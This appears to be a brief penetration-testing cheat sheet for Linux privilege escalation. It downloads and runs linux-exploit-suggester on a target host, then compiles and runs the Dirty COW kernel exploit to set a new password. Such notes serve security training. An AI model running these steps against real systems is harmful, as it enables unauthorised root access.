Linux Kernel Exploit
Privilege Escalation Process on Linux
Linux Exploit Suggester
Last updated
Last updated
# have access to the target system
/bin/bash -i
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh -O les.sh
upload les.sh
chmod +x les.sh
ls -alps
./les.sh
# download Drity Cow exploit from exploit db
# Compile the dirty.c exploit using gcc
# -pthread -> Enable POSIX threads (multithreading support)
# dirty.c -> Source code file to compile
# -o dirty -> Output filename will be "dirty"
# -lcrypt -> Link the crypt library (used for password-related functions)
gcc -pthread dirty.c -o dirty -lcrypt
chmod +x dirty
./dirty [NEW PASS]